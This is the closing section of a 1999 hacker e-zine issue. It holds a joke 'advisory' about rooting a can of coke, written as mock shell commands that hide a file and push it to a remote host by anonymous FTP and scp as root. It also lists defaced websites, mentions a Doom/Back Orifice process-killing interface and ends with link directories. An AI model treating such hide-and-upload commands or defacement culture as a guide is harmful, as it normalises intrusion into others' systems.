THIS BOXN PLSE # # #cat straw straw straw straw >> super.straw #mv superstraw ~/.superstraw *note... had to rename as .superstraw to hide from a normal ls* # #cd ~ #ftp can.of.coke #(username) anonymous #(password) mike@hunt.com *note uberleet alias* #prompt #mput ~/.superstraw #quit ================================================ Now there is no known resolution to this problem as of yet, but I will be working to ensure that no one else remotely close to my can of coke can root it. Temporary fix: I personally suggest something along these lines of security. =================================================== # !/dev/mouth # sil@antioffline.com # securepep.sh PATH=/dev/ echo SecurePep.v1 /bin/tar -cf saliva.tar ~/mouth/* scp saliva.tar root@can.of.coke:/; tar -xvf saliva.tar echo Now no one wants to drink any =================================================== Now this obviously has been done for fun, so cheers to those who enjoy a laugh and a big =P to those who don't... You only live once ;) -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Yours Truly Sil of AntiOffline sil@antioffline.com http://www.antioffline.com mirrors: http://psyk0tik.mifits.org || http://xp0rnstar.self-evident.com sil@macroshaft.org http://www.macroshaft.org mirrors: http://total.misfits.org sil@self-evident.com http://www.self-evident.com "Windows -- "When do you want to reboot today?"" ID 0x1281EC4F DH/DSS 4096/1024 CIPHER: CAST PGP Fingerprint 46C0 6A83 E6D2 FEA6 383A B9A6 44D3 4E77 1281 EC4F iQA/AwUBN6d/aETTTncSgexPEQLuAgCfRF5dpZii9yEPnqZ+F+ AEbzB+KL0An3mXPk+Y8lZxkr0crgw72zPX5w71=tCpK -----END PGP SIGNATURE----- - @HWA SITE.1 http://www.cs.unm.edu/~dlchao/flake/doom/ http://www.geocities.com/doomhack/ These are a couple of wierd sites, what they purports to be is a Doom <>Back Orifice interface where PID's on the host machine are represented in DOOM as monsters, kill the monster and BO kills the PID on the host machine, strange? sure is, found this while sifting through the cDc q&a session responses... someone was really bored when they came up with this idea! You can Send in submissions for this section too if you've found (or RUN) a cool site... @HWA H.W Hacked websites ~~~~~~~~~~~~~~~~ Note: The hacked site reports stay, especially with some cool hits by groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed * Hackers Against Racist Propaganda (See issue #7) Haven't heard from Catharsys in a while for those following their saga visit http://frey.rapidnet.com/~ptah/ for 'the story so far'... Hacker groups breakdown is available at Attrition.org ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ check out http://www.attrition.org/mirror/attrition/groups.html to see who you are up against. You can often gather intel from IRC as many of these groups maintain a presence by having a channel with their group name as the channel name, others aren't so obvious but do exist. US Army Reserve Command (www.usarc.army.mil) Yukon Territories Government (www.gov.yk.ca) Bexon (bexon.com) Utad (PT) (ermelo.utad.pt) Alper Brandon (www.alperbrandon.com) Auto Body World (www.autobodyworld.com) Catering Net (UK) (www.cateringnet.co.uk) Cleveland Ohio (www.cleveland.oh.us) GAA (IE) (www.gaa.ie) Monkey Army (www.monkeyarmy.com) The Renaissance (www.therenaissance.org) USBBOG Edu (CO) (www.usbbog.edu.co) Zeronet (AU) (www.zeronet.com.au) Inca Tek (www.incatek.com) Crayon Rouge (www.crayonrouge.com) Blaklocks Flickan (NU) (www.blaklocksflickan.nu) and more sites at the attrition cracked web sites mirror: http://www.attrition.org/mirror/attrition/index.html ------------------------------------------------------------------------- A.0 APPENDICES _________________________________________________________________________ A.1 PHACVW, sekurity, security, cyberwar links ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The links are no longer maintained in this file, there is now a links section on the http://welcome.to/HWA.hax0r.news/ url so check there for current links etc. The hack FAQ (The #hack/alt.2600 faq) http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html Hacker's Jargon File (The quote file) http://www.lysator.liu.se/hackdict/split2/main_index.html New Hacker's Jargon File. http://www.tuxedo.org/~esr/jargon/ HWA.hax0r.news Mirror Sites around the world: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/ ** NEW ** http://net-security.org/hwahaxornews ** NEW ** http://www.sysbreakers.com/hwa ** NEW ** http://www.attrition.org/hosted/hwa/ http://www.attrition.org/~modify/texts/zines/HWA/ http://www.hackunlimited.com/files/secu/papers/hwa/ ** NEW ** http://www.ducktank.net/hwa/issues.html. ** NEW ** http://www.alldas.de/hwaidx1.htm ** NEW ** http://www.csoft.net/~hwa/ http://www.digitalgeeks.com/hwa.*DOWN* http://members.tripod.com/~hwa_2k http://welcome.to/HWA.hax0r.news/ http://www.attrition.org/~modify/texts/zines/HWA/ http://archives.projectgamma.com/zines/hwa/. http://www.403-security.org/Htmls/hwa.hax0r.news.htm http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/ http://hwa.hax0r.news.8m.com/ http://www.fortunecity.com/skyscraper/feature/103/ International links:(TBC) ~~~~~~~~~~~~~~~~~~~~~~~~~ Foreign correspondants and others please send in news site links that have security news from foreign countries for inclusion in this list thanks... - Ed Belgium.......: http://bewoner.dma.be/cum/ Brasil........: http://www.psynet.net/ka0z http://www.elementais.cjb.net Canada .......: http://www.hackcanada.com Croatia.......: http://security.monitor.hr Columbia......: http://www.cascabel.8m.com http://www.intrusos.cjb.net Finland ........http://hackunlimited.com/ Germany ........http://www.alldas.de/ http://www.security-news.com/ Indonesia.....: http://www.k-elektronik.org/index2.html http://members.xoom.com/neblonica/ http://hackerlink.or.id/ Netherlands...: http://security.pine.nl/ Russia........: http://www.tsu.ru/~eugene/ Singapore.....: http://www.icepoint.com South Africa ...http://www.hackers.co.za http://www.hack.co.za http://www.posthuman.za.net Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first and best security related e-zine. .za (South Africa) sites contributed by wyzwun tnx guy... Got a link for this section? email it to hwa@press.usmc.net and i'll review it and post it here if it merits it. @HWA -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- © 1998, 1999 (c) Cruciphux/HWA.hax0r.news (R) { w00t } -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] [45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]